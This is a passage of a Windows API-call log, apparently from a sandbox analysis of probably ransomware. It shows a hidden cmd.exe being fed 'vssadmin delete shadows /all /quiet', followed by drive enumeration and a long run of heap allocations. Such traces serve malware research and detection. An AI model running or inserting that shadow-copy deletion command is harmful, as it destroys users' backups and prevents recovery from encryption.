(Heap=0xb00000, Flags=0x0, Ptr=0xb82878, Size=0x80) returned 0xbc7b60 [0240.117] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7b60, Size=0x100) returned 0xb820b8 [0240.117] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.117] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820b8 | out: hHeap=0xb00000) returned 1 [0240.117] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0xba7aa8, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0240.117] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbb7ab0 | out: hHeap=0xb00000) returned 1 [0240.117] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba7aa8 | out: hHeap=0xb00000) returned 1 [0240.119] CreatePipe (in: hReadPipe=0x18fcc4, hWritePipe=0x18fcc8, lpPipeAttributes=0x18fcb4, nSize=0x0 | out: hReadPipe=0x18fcc4*=0xe8, hWritePipe=0x18fcc8*=0xec) returned 1 [0240.125] CreatePipe (in: hReadPipe=0x18fd34, hWritePipe=0x18fd38, lpPipeAttributes=0x18fcb4, nSize=0x0 | out: hReadPipe=0x18fd34*=0xf0, hWritePipe=0x18fd38*=0xf4) returned 1 [0240.125] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0240.125] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0240.125] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fcd4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fd24 | out: lpCommandLine=0x0, lpProcessInformation=0x18fd24*(hProcess=0xfc, hThread=0xf8, dwProcessId=0x5c4, dwThreadId=0x5c8)) returned 1 [0240.179] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0240.179] WriteFile (in: hFile=0xec, lpBuffer=0xbc7ad8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fcd0, lpOverlapped=0x0 | out: lpBuffer=0xbc7ad8*, lpNumberOfBytesWritten=0x18fcd0*=0x41, lpOverlapped=0x0) returned 1 [0240.179] CloseHandle (hObject=0xfc) returned 1 [0240.179] CloseHandle (hObject=0xf8) returned 1 [0240.179] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb87aa0 | out: hHeap=0xb00000) returned 1 [0240.179] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0240.179] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc7ad8 | out: hHeap=0xb00000) returned 1 [0240.179] lstrlenW (lpString="%comspec%") returned 9 [0240.179] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5d0b8 | out: hHeap=0xb00000) returned 1 [0240.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0240.180] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d610 [0240.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0xb7d610, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0240.180] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81d20 [0240.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0xb81d20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d628 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d628, Size=0x20) returned 0xb5d0b8 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d0b8, Size=0x40) returned 0xb82878 [0240.181] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd0) returned 0xb84a08 [0240.181] GetLogicalDrives () returned 0x4 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10014) returned 0xb87aa0 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d628 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d628, Size=0x20) returned 0xb5d0b8 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d0b8, Size=0x40) returned 0xb82908 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82908, Size=0x80) returned 0xbc7ad8 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xb85ff0 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb85ff0, Size=0x200) returned 0xb85ff0 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb85ff0, Size=0x400) returned 0xb85ff0 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb85ff0, Size=0x800) returned 0xbc9ac0 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9ac0, Size=0x1000) returned 0xbc9ac0 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0xb97ac0 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d628 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d700 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb81d30 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d718 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb81d40 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d730 [0240.181] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81d40, Size=0x8) returned 0xb81d50 [0240.181] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d748 [0240.182] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81d50, Size=0x10) returned 0xb7d760 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d778 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d790 [0240.182] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d760, Size=0x20) returned 0xb5d0b8 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d760 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81d50 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb7d7a8 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb7d7c0 [0240.182] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d0b8, Size=0x40) returned 0xb82908 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb7d7d8 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb7d7f0 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb7d808 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb7d820 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d838 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d850 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81d40 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86008 [0240.182] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82908, Size=0x80) returned 0xbc7ad8 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86020 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86038 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86050 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86068 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86080 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb86098 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb860b0 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81d60 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb860c8 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb860e0 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb860f8 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86110 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb86128 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86140 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb86158 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86170 [0240.182] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xb86608 [0240.182] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86188 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb861a0 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb861b8 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb861d0 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb861e8 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86200 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81d70 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86218 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86230 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86248 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb81d80 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86260 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86278 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81d90 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86290 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb862a8 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb862c0 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb862d8 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb862f0 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86308 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb86320 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86338 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb86350 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86368 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86380 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb86398 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb863b0 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81da0 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb863c8 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaae0 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaaf8 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcab10 [0240.183] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb86608, Size=0x200) returned 0xb86608 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcab28 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81db0 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcab40 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcab58 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcab70 [0240.183] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcab88 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaba0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcabb8 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcabd0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcabe8 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcac00 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcac18 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcac30 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcac48 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcac60 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcac78 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcac90 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaca8 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcacc0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcacd8 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcacf0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcad08 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcad20 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81dc0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcad38 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcad50 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcad68 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81dd0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcad80 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcad98 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcadb0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcadc8 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcade0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcadf8 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcae10 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcae28 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcae40 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcae58 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcae70 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcae88 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaea0 [0240.184] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcaee0 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaef8 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaf10 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaf28 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaf40 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaf58 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaf70 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcaf88 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81de0 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb81df0 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcafa0 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcafb8 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcafd0 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcafe8 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb000 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb018 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb030 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb048 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb060 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb078 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb090 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb0a8 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb0c0 [0240.185] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb86608, Size=0x400) returned 0xb86608 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb0d8 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb0f0 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb108 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb120 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb138 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb150 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb168 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb180 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb198 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb1b0 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81e00 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb1c8 [0240.185] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb1e0 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb1f8 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb210 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb228 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb240 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbcb258 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb270 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb288 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb2a0 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb2e0 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb2f8 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb310 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb328 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb340 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81e10 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb358 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb370 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb388 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb3a0 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb3b8 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb3d0 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb3e8 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb400 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb418 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbcb430 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb448 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbcb460 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb478 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb490 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb4a8 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb4c0 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb4d8 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb4f0 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb508 [0240.186] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb520 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb538 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb550 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb568 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb580 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb598 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb5b0 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb5c8 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb5e0 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb5f8 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb610 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb628 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb640 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb658 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb670 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb688 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xbcb6a0 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x12) returned 0xb838c0 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb6e0 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb6f8 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb710 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb728 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb740 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 